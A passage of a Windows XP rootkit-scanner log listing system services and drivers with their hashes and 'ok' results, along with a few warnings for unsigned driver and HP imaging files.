20:31:30.0484 2536 [ C7ABBC59B43274B1109DF6B24D617051 ] SysmonLog C:\WINDOWS\system32\smlogsvc.exe
20:31:30.0500 2536 SysmonLog - ok
20:31:30.0531 2536 [ 3CB78C17BB664637787C9A1C98F79C38 ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
20:31:30.0546 2536 TapiSrv - ok
20:31:30.0593 2536 [ 9AEFA14BD6B182D61E3119FA5F436D3D ] Tcpip C:\WINDOWS\system32\DRIVERS\tcpip.sys
20:31:30.0609 2536 Tcpip - ok
20:31:30.0640 2536 [ 6471A66807F5E104E4885F5B67349397 ] TDPIPE C:\WINDOWS\system32\drivers\TDPIPE.sys
20:31:30.0640 2536 TDPIPE - ok
20:31:30.0656 2536 [ C56B6D0402371CF3700EB322EF3AAF61 ] TDTCP C:\WINDOWS\system32\drivers\TDTCP.sys
20:31:30.0656 2536 TDTCP - ok
20:31:30.0687 2536 [ 88155247177638048422893737429D9E ] TermDD C:\WINDOWS\system32\DRIVERS\termdd.sys
20:31:30.0687 2536 TermDD - ok
20:31:30.0750 2536 [ FF3477C03BE7201C294C35F684B3479F ] TermService C:\WINDOWS\System32\termsrv.dll
20:31:30.0765 2536 TermService - ok
20:31:30.0781 2536 [ 99BC0B50F511924348BE19C7C7313BBF ] Themes C:\WINDOWS\System32\shsvcs.dll
20:31:30.0796 2536 Themes - ok
20:31:30.0812 2536 TosIde - ok
20:31:30.0828 2536 [ 55BCA12F7F523D35CA3CB833C725F54E ] TrkWks C:\WINDOWS\system32\trkwks.dll
20:31:30.0843 2536 TrkWks - ok
20:31:30.0875 2536 [ 5787B80C2E3C5E2F56C2A233D91FA2C9 ] Udfs C:\WINDOWS\system32\drivers\Udfs.sys
20:31:30.0875 2536 Udfs - ok
20:31:30.0890 2536 ultra - ok
20:31:30.0937 2536 [ 402DDC88356B1BAC0EE3DD1580C76A31 ] Update C:\WINDOWS\system32\DRIVERS\update.sys
20:31:30.0953 2536 Update - ok
20:31:31.0000 2536 [ 1EBAFEB9A3FBDC41B8D9C7F0F687AD91 ] upnphost C:\WINDOWS\System32\upnphost.dll
20:31:31.0015 2536 upnphost - ok
20:31:31.0046 2536 [ 05365FB38FCA1E98F7A566AAAF5D1815 ] UPS C:\WINDOWS\System32\ups.exe
20:31:31.0062 2536 UPS - ok
20:31:31.0078 2536 [ E919708DB44ED8543A7C017953148330 ] usbaudio C:\WINDOWS\system32\drivers\usbaudio.sys
20:31:31.0093 2536 usbaudio - ok
20:31:31.0125 2536 [ 173F317CE0DB8E21322E71B7E60A27E8 ] usbccgp C:\WINDOWS\system32\DRIVERS\usbccgp.sys
20:31:31.0125 2536 usbccgp - ok
20:31:31.0187 2536 [ 65DCF09D0E37D4C6B11B5B0B76D470A7 ] usbehci C:\WINDOWS\system32\DRIVERS\usbehci.sys
20:31:31.0187 2536 usbehci - ok
20:31:31.0203 2536 [ 1AB3CDDE553B6E064D2E754EFE20285C ] usbhub C:\WINDOWS\system32\DRIVERS\usbhub.sys
20:31:31.0203 2536 usbhub - ok
20:31:31.0234 2536 [ 0DAECCE65366EA32B162F85F07C6753B ] usbohci C:\WINDOWS\system32\DRIVERS\usbohci.sys
20:31:31.0234 2536 usbohci - ok
20:31:31.0250 2536 [ A717C8721046828520C9EDF31288FC00 ] usbprint C:\WINDOWS\system32\DRIVERS\usbprint.sys
20:31:31.0250 2536 usbprint - ok
20:31:31.0281 2536 [ A0B8CF9DEB1184FBDD20784A58FA75D4 ] usbscan C:\WINDOWS\system32\DRIVERS\usbscan.sys
20:31:31.0281 2536 usbscan - ok
20:31:31.0312 2536 [ A32426D9B14A089EAA1D922E0C5801A9 ] USBSTOR C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
20:31:31.0312 2536 USBSTOR - ok
20:31:31.0359 2536 [ 26496F9DEE2D787FC3E61AD54821FFE6 ] usbuhci C:\WINDOWS\system32\DRIVERS\usbuhci.sys
20:31:31.0359 2536 usbuhci - ok
20:31:31.0359 2536 [ 0D3A8FAFCEACD8B7625CD549757A7DF1 ] VgaSave C:\WINDOWS\System32\drivers\vga.sys
20:31:31.0375 2536 VgaSave - ok
20:31:31.0406 2536 [ 4B039BBD037B01F5DB5A144C837F283A ] viaagp1 C:\WINDOWS\system32\DRIVERS\viaagp1.sys
20:31:31.0406 2536 viaagp1 - ok
20:31:31.0437 2536 [ 0CC705DB634A3BC355887E3D478DD386 ] viagfx C:\WINDOWS\system32\DRIVERS\vtmini.sys
20:31:31.0453 2536 viagfx - ok
20:31:31.0453 2536 [ 3B3EFCDA263B8AC14FDF9CBDD0791B2E ] ViaIde C:\WINDOWS\system32\DRIVERS\viaide.sys
20:31:31.0468 2536 ViaIde - ok
20:31:31.0468 2536 [ 4C8FCB5CC53AAB716D810740FE59D025 ] VolSnap C:\WINDOWS\system32\drivers\VolSnap.sys
20:31:31.0484 2536 VolSnap - ok
20:31:31.0515 2536 [ 7A9DB3A67C333BF0BD42E42B8596854B ] VSS C:\WINDOWS\System32\vssvc.exe
20:31:31.0546 2536 VSS - ok
20:31:31.0578 2536 [ 54AF4B1D5459500EF0937F6D33B1914F ] W32Time C:\WINDOWS\system32\w32time.dll
20:31:31.0593 2536 W32Time - ok
20:31:31.0609 2536 [ E20B95BAEDB550F32DD489265C1DA1F6 ] Wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
20:31:31.0609 2536 Wanarp - ok
20:31:31.0625 2536 WDICA - ok
20:31:31.0640 2536 [ 6768ACF64B18196494413695F0C3A00F ] wdmaud C:\WINDOWS\system32\drivers\wdmaud.sys
20:31:31.0640 2536 wdmaud - ok
20:31:31.0671 2536 [ 77A354E28153AD2D5E120A5A8687BC06 ] WebClient C:\WINDOWS\System32\webclnt.dll
20:31:31.0687 2536 WebClient - ok
20:31:31.0765 2536 [ F45DD1E1365D857DD08BC23563370D0E ] WinDefend C:\Program Files\Windows Defender\MsMpEng.exe
20:31:31.0765 2536 WinDefend - ok
20:31:31.0843 2536 [ 2D0E4ED081963804CCC196A0929275B5 ] winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
20:31:31.0859 2536 winmgmt - ok
20:31:31.0906 2536 [ C51B4A5C05A5475708E3C81C7765B71D ] WmdmPmSN C:\WINDOWS\system32\MsPMSNSv.dll
20:31:31.0921 2536 WmdmPmSN - ok
20:31:31.0953 2536 [ E0673F1106E62A68D2257E376079F821 ] WmiApSrv C:\WINDOWS\System32\wbem\wmiapsrv.exe
20:31:31.0953 2536 WmiApSrv - ok
20:31:32.0046 2536 [ F74E3D9A7FA9556C3BBB14D4E5E63D3B ] WMPNetworkSvc C:\Program Files\Windows Media Player\WMPNetwk.exe
20:31:32.0078 2536 WMPNetworkSvc - ok
20:31:32.0109 2536 [ CF4DEF1BF66F06964DC0D91844239104 ] WpdUsb C:\WINDOWS\system32\DRIVERS\wpdusb.sys
20:31:32.0109 2536 WpdUsb - ok
20:31:32.0156 2536 [ 6ABE6E225ADB5A751622A9CC3BC19CE8 ] WS2IFSL C:\WINDOWS\System32\drivers\ws2ifsl.sys
20:31:32.0156 2536 WS2IFSL - ok
20:31:32.0203 2536 [ 7C278E6408D1DCE642230C0585A854D5 ] wscsvc C:\WINDOWS\system32\wscsvc.dll
20:31:32.0250 2536 wscsvc - ok
20:31:32.0281 2536 [ 35321FB577CDC98CE3EB3A3EB9E4610A ] wuauserv C:\WINDOWS\system32\wuauserv.dll
20:31:32.0296 2536 wuauserv - ok
20:31:32.0328 2536 [ F15FEAFFFBB3644CCC80C5DA584E6311 ] WudfPf C:\WINDOWS\system32\DRIVERS\WudfPf.sys
20:31:32.0343 2536 WudfPf - ok
20:31:32.0375 2536 [ 28B524262BCE6DE1F7EF9F510BA3985B ] WudfRd C:\WINDOWS\system32\DRIVERS\wudfrd.sys
20:31:32.0375 2536 WudfRd - ok
20:31:32.0390 2536 [ 05231C04253C5BC30B26CBAAE680ED89 ] WudfSvc C:\WINDOWS\System32\WUDFSvc.dll
20:31:32.0437 2536 WudfSvc - ok
20:31:32.0484 2536 [ 81DC3F549F44B1C1FFF022DEC9ECF30B ] WZCSVC C:\WINDOWS\System32\wzcsvc.dll
20:31:32.0531 2536 WZCSVC - ok
20:31:32.0562 2536 [ 295D21F14C335B53CB8154E5B1F892B9 ] xmlprov C:\WINDOWS\System32\xmlprov.dll
20:31:32.0578 2536 xmlprov - ok
20:31:32.0593 2536 ================ Scan global ===============================
20:31:32.0640 2536 [ 42F1F4C0AFB08410E5F02D4B13EBB623 ] C:\WINDOWS\system32\basesrv.dll
20:31:32.0671 2536 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
20:31:32.0703 2536 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
20:31:32.0718 2536 [ 65DF52F5B8B6E9BBD183505225C37315 ] C:\WINDOWS\system32\services.exe
20:31:32.0734 2536 [Global] - ok
20:31:32.0734 2536 ================ Scan MBR ==================================
20:31:32.0750 2536 [ BAD0263FBE81B49F5F07B32DC9D198B3 ] \Device\Harddisk0\DR0
20:31:32.0921 2536 \Device\Harddisk0\DR0 - ok
20:31:32.0921 2536 ================ Scan VBR ==================================
20:31:32.0921 2536 [ 085D431551BA33298DDBA5C93B1F437B ] \Device\Harddisk0\DR0\Partition1
20:31:32.0921 2536 \Device\Harddisk0\DR0\Partition1 - ok
20:31:32.0921 2536 [ 98DE57513725D00BD7B7284BCAEF83E8 ] \Device\Harddisk0\DR0\Partition2
20:31:32.0937 2536 \Device\Harddisk0\DR0\Partition2 - ok
20:31:32.0937 2536 ============================================================
20:31:32.0937 2536 Scan finished
20:31:32.0937 2536 ============================================================
20:31:32.0953 2924 Detected object count: 0
20:31:32.0953 2924 Actual detected object count: 0
20:32:15.0531 3536 ============================================================
20:32:15.0546 3536 Scan started
20:32:15.0546 3536 Mode: Manual; SigCheck; TDLFS;
20:32:15.0546 3536 ============================================================
20:32:15.0640 3536 ================ Scan system memory ========================
20:32:15.0640 3536 System memory - ok
20:32:15.0640 3536 ================ Scan services =============================
20:32:15.0812 3536 [ 149A8F7ADF9742554DC323E290551E3E ] Aavmker4 C:\WINDOWS\system32\drivers\Aavmker4.sys
20:32:17.0484 3536 Aavmker4 - ok
20:32:17.0500 3536 Abiosdsk - ok
20:32:17.0500 3536 abp480n5 - ok
20:32:17.0593 3536 [ 8FD99680A539792A30E97944FDAECF17 ] ACPI C:\WINDOWS\system32\DRIVERS\ACPI.sys
20:32:18.0640 3536 ACPI - ok
20:32:18.0687 3536 [ 9859C0F6936E723E4892D7141B1327D5 ] ACPIEC C:\WINDOWS\system32\drivers\ACPIEC.sys
20:32:18.0906 3536 ACPIEC - ok
20:32:18.0921 3536 adpu160m - ok
20:32:18.0984 3536 [ 8BED39E3C35D6A489438B8141717A557 ] aec C:\WINDOWS\system32\drivers\aec.sys
20:32:19.0218 3536 aec - ok
20:32:19.0265 3536 [ 1E44BC1E83D8FD2305F8D452DB109CF9 ] AFD C:\WINDOWS\System32\drivers\afd.sys
20:32:19.0328 3536 AFD - ok
20:32:19.0343 3536 [ C685CC27A2E637F0DCB5A45E67CC6F74 ] AFS2K C:\WINDOWS\system32\drivers\AFS2K.sys
20:32:19.0375 3536 AFS2K - ok
20:32:19.0421 3536 [ 593AEFC67283D409F34CC1245D00A509 ] AgereSoftModem C:\WINDOWS\system32\DRIVERS\AGRSM.sys
20:32:19.0546 3536 AgereSoftModem - ok
20:32:19.0562 3536 Aha154x - ok
20:32:19.0578 3536 aic78u2 - ok
20:32:19.0593 3536 aic78xx - ok
20:32:19.0609 3536 [ A9A3DAA780CA6C9671A19D52456705B4 ] Alerter C:\WINDOWS\system32\alrsvc.dll
20:32:19.0859 3536 Alerter - ok
20:32:19.0890 3536 [ 8C515081584A38AA007909CD02020B3D ] ALG C:\WINDOWS\System32\alg.exe
20:32:19.0984 3536 ALG - ok
20:32:20.0000 3536 AliIde - ok
20:32:20.0109 3536 [ 8FCE268CDBDD83B23419D1F35F42C7B1 ] AmdK7 C:\WINDOWS\system32\DRIVERS\amdk7.sys
20:32:20.0328 3536 AmdK7 - ok
20:32:20.0343 3536 amsint - ok
20:32:20.0343 3536 AppMgmt - ok
20:32:20.0390 3536 [ B5B8A80875C1DEDEDA8B02765642C32F ] Arp1394 C:\WINDOWS\system32\DRIVERS\arp1394.sys
20:32:20.0609 3536 Arp1394 - ok
20:32:20.0625 3536 asc - ok
20:32:20.0640 3536 asc3350p - ok
20:32:20.0640 3536 asc3550 - ok
20:32:20.0781 3536 [ 0E5E4957549056E2BF2C49F4F6B601AD ] aspnet_state C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
20:32:20.0812 3536 aspnet_state - ok
20:32:20.0843 3536 [ DE6ED95AEF259979B2830450072A627B ] aswFsBlk C:\WINDOWS\system32\drivers\aswFsBlk.sys
20:32:20.0875 3536 aswFsBlk - ok
20:32:20.0906 3536 [ 84F0BE324EE111338589F448C3E8BAB2 ] aswMon2 C:\WINDOWS\system32\drivers\aswMon2.sys
20:32:20.0937 3536 aswMon2 - ok
20:32:20.0984 3536 [ 7C9F0A2AB17D52261A9252A2EB320884 ] AswRdr C:\WINDOWS\system32\drivers\AswRdr.sys
20:32:21.0015 3536 AswRdr - ok
20:32:21.0031 3536 [ B32E9AD44A1DBB3E8095E80F8DF32B03 ] aswSnx C:\WINDOWS\system32\drivers\aswSnx.sys
20:32:21.0093 3536 aswSnx - ok
20:32:21.0140 3536 [ 67B558895695545FB0568B7541F3BCA7 ] aswSP C:\WINDOWS\system32\drivers\aswSP.sys
20:32:21.0187 3536 aswSP - ok
20:32:21.0234 3536 [ E3E73B2B73A4DFADFDDF557192C4B08A ] aswTdi C:\WINDOWS\system32\drivers\aswTdi.sys
20:32:21.0265 3536 aswTdi - ok
20:32:21.0281 3536 [ B153AFFAC761E7F5FCFA822B9C4E97BC ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
20:32:21.0468 3536 AsyncMac - ok
20:32:21.0515 3536 [ 9F3A2F5AA6875C72BF062C712CFA2674 ] atapi C:\WINDOWS\system32\DRIVERS\atapi.sys
20:32:21.0687 3536 atapi - ok
20:32:21.0687 3536 Atdisk - ok
20:32:21.0718 3536 [ 9916C1225104BA14794209CFA8012159 ] Atmarpc C:\WINDOWS\system32\DRIVERS\atmarpc.sys
20:32:21.0890 3536 Atmarpc - ok
20:32:21.0937 3536 [ DEF7A7882BEC100FE0B2CE2549188F9D ] AudioSrv C:\WINDOWS\System32\audiosrv.dll
20:32:22.0093 3536 AudioSrv - ok
20:32:22.0140 3536 [ D9F724AA26C010A217C97606B160ED68 ] audstub C:\WINDOWS\system32\DRIVERS\audstub.sys
20:32:22.0296 3536 audstub - ok
20:32:22.0406 3536 [ 8FA553E9AE69808D99C164733A0F9590 ] avast! Antivirus C:\Program Files\AVAST Software\Avast\AvastSvc.exe
20:32:22.0515 3536 avast! Antivirus - ok
20:32:22.0578 3536 [ DA1F27D85E0D1525F6621372E7B685E9 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
20:32:22.0734 3536 Beep - ok
20:32:22.0796 3536 [ 574738F61FCA2935F5265DC4E5691314 ] BITS C:\WINDOWS\system32\qmgr.dll
20:32:22.0984 3536 BITS - ok
20:32:23.0031 3536 [ 3F56903E124E820AEECE6D471583C6C1 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
20:32:23.0046 3536 Bonjour Service - ok
20:32:23.0093 3536 [ CFD4E51402DA9838B5A04AE680AF54A0 ] Browser C:\WINDOWS\System32\browser.dll
20:32:23.0171 3536 Browser - ok
20:32:23.0203 3536 [ 248DFA5762DDE38DFDDBBD44149E9D7A ] BVRPMPR5 C:\WINDOWS\system32\drivers\BVRPMPR5.SYS
20:32:23.0234 3536 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - warning
20:32:23.0234 3536 BVRPMPR5 - detected UnsignedFile.Multi.Generic (1)
20:32:23.0390 3536 catchme - ok
20:32:23.0421 3536 [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf2k C:\WINDOWS\system32\drivers\cbidf2k.sys
20:32:23.0578 3536 cbidf2k - ok
20:32:23.0593 3536 cd20xrnt - ok
20:32:23.0609 3536 [ C1B486A7658353D33A10CC15211A873B ] Cdaudio C:\WINDOWS\system32\drivers\Cdaudio.sys
20:32:23.0765 3536 Cdaudio - ok
20:32:23.0796 3536 [ C885B02847F5D2FD45A24E219ED93B32 ] Cdfs C:\WINDOWS\system32\drivers\Cdfs.sys
20:32:23.0968 3536 Cdfs - ok
20:32:23.0984 3536 [ 1F4260CC5B42272D71F79E570A27A4FE ] Cdrom C:\WINDOWS\system32\DRIVERS\cdrom.sys
20:32:24.0140 3536 Cdrom - ok
20:32:24.0156 3536 Changer - ok
20:32:24.0187 3536 [ 1CFE720EB8D93A7158A4EBC3AB178BDE ] CiSvc C:\WINDOWS\system32\cisvc.exe
20:32:24.0343 3536 CiSvc - ok
20:32:24.0375 3536 [ 34CBE729F38138217F9C80212A2A0C82 ] ClipSrv C:\WINDOWS\system32\clipsrv.exe
20:32:24.0531 3536 ClipSrv - ok
20:32:24.0593 3536 [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
20:32:24.0609 3536 clr_optimization_v2.0.50727_32 - ok
20:32:24.0625 3536 CmdIde - ok
20:32:24.0625 3536 COMSysApp - ok
20:32:24.0656 3536 Cpqarray - ok
20:32:24.0703 3536 [ 3D4E199942E29207970E04315D02AD3B ] CryptSvc C:\WINDOWS\System32\cryptsvc.dll
20:32:24.0906 3536 CryptSvc - ok
20:32:24.0906 3536 dac2w2k - ok
20:32:24.0921 3536 dac960nt - ok
20:32:24.0968 3536 [ 6B27A5C03DFB94B4245739065431322C ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
20:32:25.0046 3536 DcomLaunch - ok
20:32:25.0078 3536 [ 5E38D7684A49CACFB752B046357E0589 ] Dhcp C:\WINDOWS\System32\dhcpcsvc.dll
20:32:25.0234 3536 Dhcp - ok
20:32:25.0281 3536 [ 044452051F3E02E7963599FC8F4F3E25 ] Disk C:\WINDOWS\system32\DRIVERS\disk.sys
20:32:25.0437 3536 Disk - ok
20:32:25.0453 3536 dmadmin - ok
20:32:25.0500 3536 [ D992FE1274BDE0F84AD826ACAE022A41 ] dmboot C:\WINDOWS\system32\drivers\dmboot.sys
20:32:25.0703 3536 dmboot - ok
20:32:25.0734 3536 [ 7C824CF7BBDE77D95C08005717A95F6F ] dmio C:\WINDOWS\system32\drivers\dmio.sys
20:32:25.0906 3536 dmio - ok
20:32:25.0953 3536 [ E9317282A63CA4D188C0DF5E09C6AC5F ] dmload C:\WINDOWS\system32\drivers\dmload.sys
20:32:26.0093 3536 dmload - ok
20:32:26.0125 3536 [ 57EDEC2E5F59F0335E92F35184BC8631 ] dmserver C:\WINDOWS\System32\dmserver.dll
20:32:26.0265 3536 dmserver - ok
20:32:26.0312 3536 [ 8A208DFCF89792A484E76C40E5F50B45 ] DMusic C:\WINDOWS\system32\drivers\DMusic.sys
20:32:26.0468 3536 DMusic - ok
20:32:26.0515 3536 [ 5F7E24FA9EAB896051FFB87F840730D2 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
20:32:26.0609 3536 Dnscache - ok
20:32:26.0625 3536 [ 0F0F6E687E5E15579EF4DA8DD6945814 ] Dot3svc C:\WINDOWS\System32\dot3svc.dll
20:32:26.0796 3536 Dot3svc - ok
20:32:26.0812 3536 dpti2o - ok
20:32:26.0828 3536 [ 8F5FCFF8E8848AFAC920905FBD9D33C8 ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
20:32:26.0968 3536 drmkaud - ok
20:32:27.0000 3536 [ 2187855A7703ADEF0CEF9EE4285182CC ] EapHost C:\WINDOWS\System32\eapsvc.dll
20:32:27.0171 3536 EapHost - ok
20:32:27.0218 3536 [ BC93B4A066477954555966D77FEC9ECB ] ERSvc C:\WINDOWS\System32\ersvc.dll
20:32:27.0359 3536 ERSvc - ok
20:32:27.0406 3536 [ 38008FAAA9632C2EF8E98BF1614D0527 ] eusk2par C:\WINDOWS\system32\Drivers\eusk2par.sys
20:32:27.0421 3536 eusk2par - ok
20:32:27.0468 3536 [ 65DF52F5B8B6E9BBD183505225C37315 ] Eventlog C:\WINDOWS\system32\services.exe
20:32:27.0500 3536 Eventlog - ok
20:32:27.0546 3536 [ D4991D98F2DB73C60D042F1AEF79EFAE ] EventSystem C:\WINDOWS\System32\es.dll
20:32:27.0609 3536 EventSystem - ok
20:32:27.0640 3536 [ 38D332A6D56AF32635675F132548343E ] Fastfat C:\WINDOWS\system32\drivers\Fastfat.sys
20:32:27.0796 3536 Fastfat - ok
20:32:27.0796 3536 [ 1E580770BDECE924494B368AC980749E ] fasttx2k C:\WINDOWS\system32\DRIVERS\fasttx2k.sys
20:32:27.0859 3536 fasttx2k - ok
20:32:27.0890 3536 [ 99BC0B50F511924348BE19C7C7313BBF ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
20:32:27.0953 3536 FastUserSwitchingCompatibility - ok
20:32:27.0984 3536 [ E97D6A8684466DF94FF3BC24FB787A07 ] Fax C:\WINDOWS\system32\fxssvc.exe
20:32:28.0187 3536 Fax - ok
20:32:28.0203 3536 [ 92CDD60B6730B9F50F6A1A0C1F8CDC81 ] Fdc C:\WINDOWS\system32\DRIVERS\fdc.sys
20:32:28.0359 3536 Fdc - ok
20:32:28.0375 3536 [ D45926117EB9FA946A6AF572FBE1CAA3 ] Fips C:\WINDOWS\system32\drivers\Fips.sys
20:32:28.0531 3536 Fips - ok
20:32:28.0562 3536 [ 9D27E7B80BFCDF1CDD9B555862D5E7F0 ] Flpydisk C:\WINDOWS\system32\DRIVERS\flpydisk.sys
20:32:28.0703 3536 Flpydisk - ok
20:32:28.0750 3536 [ B2CF4B0786F8212CB92ED2B50C6DB6B0 ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
20:32:28.0921 3536 FltMgr - ok
20:32:29.0015 3536 [ 8BA7C024070F2B7FDD98ED8A4BA41789 ] FontCache3.0.0.0 c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
20:32:29.0031 3536 FontCache3.0.0.0 - ok
20:32:29.0078 3536 [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
20:32:29.0218 3536 Fs_Rec - ok
20:32:29.0250 3536 [ 6AC26732762483366C3969C9E4D2259D ] Ftdisk C:\WINDOWS\system32\DRIVERS\ftdisk.sys
20:32:29.0437 3536 Ftdisk - ok
20:32:29.0468 3536 [ AB8A6A87D9D7255C3884D5B9541A6E80 ] GEARAspiWDM C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
20:32:29.0484 3536 GEARAspiWDM - ok
20:32:29.0515 3536 [ 0A02C63C8B144BD8C86B103DEE7C86A2 ] Gpc C:\WINDOWS\system32\DRIVERS\msgpc.sys
20:32:29.0656 3536 Gpc - ok
20:32:29.0734 3536 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdate C:\Program Files\Google\Update\GoogleUpdate.exe
20:32:29.0750 3536 gupdate - ok
20:32:29.0765 3536 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdatem C:\Program Files\Google\Update\GoogleUpdate.exe
20:32:29.0781 3536 gupdatem - ok
20:32:29.0796 3536 [ 573C7D0A32852B48F3058CFD8026F511 ] HDAudBus C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
20:32:29.0968 3536 HDAudBus - ok
20:32:30.0046 3536 [ 4FCCA060DFE0C51A09DD5C3843888BCD ] helpsvc C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
20:32:30.0187 3536 helpsvc - ok
20:32:30.0203 3536 HidServ - ok
20:32:30.0234 3536 [ CCF82C5EC8A7326C3066DE870C06DAF1 ] HidUsb C:\WINDOWS\system32\DRIVERS\hidusb.sys
20:32:30.0375 3536 HidUsb - ok
20:32:30.0406 3536 [ 8878BD685E490239777BFE51320B88E9 ] hkmsvc C:\WINDOWS\System32\kmsvc.dll
20:32:30.0593 3536 hkmsvc - ok
20:32:30.0593 3536 hpn - ok
20:32:30.0703 3536 [ CE0FCEC4D4D860F36D972759B11EAF0F ] hpqcxs08 C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
20:32:30.0750 3536 hpqcxs08 ( UnsignedFile.Multi.Generic ) - warning
20:32:30.0750 3536 hpqcxs08 - detected UnsignedFile.Multi.Generic (1)
20:32:30.0765 3536 [ EE4C7A4CF2316701FFDE90F404520265 ] hpqddsvc C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
20:32:30.0781 3536 hpqddsvc ( UnsignedFile.Multi.Generic ) - warning
20:32:30.0781 3536 hpqddsvc - detected UnsignedFile.Multi.Generic (1)
20:32:30.0828 3536 [ 5FABA4775D4C61E55EC669D643FFC71F ] HPZid412 C:\WINDOWS\system32\DRIVERS\HPZid412.sys
20:32:30.0937 3536 HPZid412 - ok
20:32:30.0953 3536 [ A3C43980EE1F1BEAC778B44EA65DBDD4 ] HPZipr12 C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
20:32:31.0015 3536 HPZipr12 - ok
20:32:31.0031 3536 [ 2906949BD4E206F2BB0DD1896CE9F66F ] HPZius12 C:\WINDOWS\system32\DRIVERS\HPZius12.sys
20:32:31.0109 3536 HPZius12 - ok
20:32:31.0140 3536 [ F80A415EF82CD06FFAF0D971528EAD38 ] HTTP C:\WINDOWS\system32\Drivers\HTTP.sys
20:32:31.0203 3536 HTTP - ok
20:32:31.0234 3536 [ 6100A808600F44D999CEBDEF8841C7A3 ] HTTPFilter C:\WINDOWS\System32\w3ssl.dll
20:32:31.0375 3536 HTTPFilter - ok
20:32:31.0375 3536 i2omgmt - ok
20:32:31.0390 3536 i2omp - ok
20:32:31.0437 3536 [ 4A0B06AA8943C1E332520F7440C0AA30 ] i8042prt C:\WINDOWS\system32\DRIVERS\i8042prt.sys
20:32:31.0593 3536 i8042prt - ok
20:32:31.0656 3536 [ 0ACEBB31989CBF9A5663FE4A33D28D21 ] ialm C:\WINDOWS\system32\DRIVERS\ialmnt5.sys
20:32:31.0750 3536 ialm - ok
20:32:31.0843 3536 [ C01AC32DC5C03076CFB852CB5DA5229C ] idsvc C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
20:32:31.0890 3536 idsvc - ok
20:32:31.0937 3536 [ 083A052659F5310DD8B6A6CB05EDCF8E ] Imapi C:\WINDOWS\system32\DRIVERS\imapi.sys
20:32:32.0078 3536 Imapi - ok
20:32:32.0125 3536 [ 30DEAF54A9755BB8546168CFE8A6B5E1 ] ImapiService C:\WINDOWS\system32\imapi.exe
20:32:32.0296 3536 ImapiService - ok
20:32:32.0296 3536 ini910u - ok
20:32:32.0406 3536 [ D383CEF6C0EF6DCAC644E2B954F2C202 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
20:32:32.0515 3536 IntcAzAudAddService - ok
20:32:32.0546 3536 [ B5466A9250342A7AA0CD1FBA13420678 ] IntelIde C:\WINDOWS\system32\DRIVERS\intelide.sys
20:32:32.0671 3536 IntelIde - ok
20:32:32.0718 3536 [ 8C953733D8F36EB2133F5BB58808B66B ] intelppm C:\WINDOWS\system32\DRIVERS\intelppm.sys
20:32:32.0859 3536 intelppm - ok
20:32:32.0890 3536 [ 3BB22519A194418D5FEC05D800A19AD0 ] ip6fw C:\WINDOWS\system32\drivers\ip6fw.sys
20:32:33.0062 3536 ip6fw - ok
20:32:33.0093 3536 [ 731F22BA402EE4B62748ADAF6363C182 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
20:32:33.0250 3536 IpFilterDriver - ok
20:32:33.0281 3536 [ B87AB476DCF76E72010632B5550955F5 ] IpInIp C:\WINDOWS\system32\DRIVERS\ipinip.sys
20:32:33.0421 3536 IpInIp - ok
20:32:33.0437 3536 [ CC748EA12C6EFFDE940EE98098BF96BB ] IpNat C:\WINDOWS\system32\DRIVERS\ipnat.sys
20:32:33.0578 3536 IpNat - ok
20:32:33.0625 3536 [ 62937A89470AF8FF172F0980CA8AEFC9 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
20:32:33.0656 3536 iPod Service - ok
20:32:33.0703 3536 [ 23C74D75E36E7158768DD63D92789A91 ] IPSec C:\WINDOWS\system32\DRIVERS\ipsec.sys
20:32:33.0859 3536 IPSec - ok
20:32:33.0890 3536 [ C93C9FF7B04D772627A3646D89F7BF89 ] IRENUM C:\WINDOWS\system32\DRIVERS\irenum.sys
20:32:33.0968 3536 IRENUM - ok
20:32:34.0000 3536 [ 05A299EC56E52649B1CF2FC52D20F2D7 ] isapnp C:\WINDOWS\system32\DRIVERS\isapnp.sys
20:32:34.0125 3536 isapnp - ok
20:32:34.0171 3536 [ F59C3569A2F2C464BB78CB1BDCDCA55E ] Iviaspi C:\WINDOWS\system32\drivers\iviaspi.sys
20:32:34.0171 3536 Iviaspi ( UnsignedFile.Multi.Generic ) - warning
20:32:34.0171 3536 Iviaspi - detected UnsignedFile.Multi.Generic (1)
20:32:34.0296 3536 [ 32192B4EBE8720ED8D49A455C962CB91 ] JavaQuickStarterService C:\Program Files\Java\jre6\bin\jqs.exe
20:32:34.0328 3536 JavaQuickStarterService - ok
